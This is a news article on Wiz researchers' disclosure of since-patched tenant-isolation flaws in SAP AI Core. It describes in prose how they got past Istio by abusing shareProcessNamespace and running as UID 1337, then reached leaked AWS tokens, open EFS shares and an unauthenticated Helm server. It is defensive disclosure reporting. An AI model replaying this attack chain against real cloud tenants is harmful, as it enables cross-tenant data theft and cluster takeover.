SAP has fixed vulnerabilities in its SAP AI Core service that could have allowed an attacker to access sensitive data of other tenants in the shared SAP cloud infrastructure.
The flaws, which were patched in May and disclosed publicly by Wiz researchers on Wednesday, are the third example the researchers found of AI services failing to properly isolate tenants. The team previously discovered similar flaws in the Hugging Face and Replicate AI services.
“We believe these services are more susceptible to tenant isolation vulnerabilities, since by definition, they allow users to run AI models and applications — which is equivalent to executing arbitrary code,” the researchers wrote.
Istio bypass grants access to internal SAP network
The Wiz researchers found that, as an SAP AI customer, their movement through the internal network was restricted by Istio. Istio is an open-source service mesh that manages traffic and acted as a sort of firewall between tenants and the rest of the internal network.
The team used their normal SAP AI Core customer permissions to spawn a Kubernetes Pod and execute code through the AI training that attempted to bypass the Pod’s Istio proxy sidecar, such as by running their container as “root,” which was unsuccessful.
However, they ultimately achieved the bypass through two configurations that were not blocked — “shareProcessNamespace” and “runAsUser.”
The former enabled them to share the process namespace with the Istio proxy and access its configuration, which included an access token to the cluster’s centralized Istiod server, while the latter enabled them to run AI training procedures (i.e. execute code) under Istio’s user ID (UID), which turned out to be “1337.”
Since Istio itself was excluded from the firewall-like traffic restrictions, running as UID 1337 enabled the researchers to move laterally through the internal network and access other tenants’ services.
SAP AI vulnerabilities leaked access tokens, AI data and more
With access to SAP’s internal network, the researchers found a treasure trove of sensitive data that an attacker could have potentially compromised using a similar exploit.
In one case, they were able to send requests to an API endpoint of a Grafana Loki instance on the cluster, which returned a full configuration including AWS tokens for accessing the instance’s S3 bucket. The bucket contained a several logs from SAP AI Core services of other customers.
The researchers also discovered six instances of Amazon Web Services (AWS) Elastic File System (EFS), which has a default configuration that makes view and edit file permissions available without authentication to anyone with network access to an instance’s Network File System (NFS) ports.
Due to their access to the SAP internal network and the default configurations of the six AWS EFS instances, the researchers were able to access sensitive AI data, including code and training datasets, stored on the instances.
However, the “most interesting finding,” according to the researchers, was an unauthenticated Helm server with read and write access that could be exploited to achieve a complete takeover of the Kubernetes cluster. Compromising the Helm server not only granted access to a wide array of sensitive data, but also the ability to potentially poison images and builds with malicious code, leading to a supply chain attack.
“This research demonstrates the unique challenges that the AI R&D process introduces. AI training requires running arbitrary code by definition; therefore, appropriate guardrails should be in place to assure that untrusted code is properly separated from internal assets and other tenants,” the researchers concluded.
According to a disclosure timeline provided by Wiz, their findings were first reported to SAP in January, with an initial fix applied in February. Final patches for all of the vulnerabilities were completed in May after the researchers demonstrated and reported bypasses to the February patch to SAP.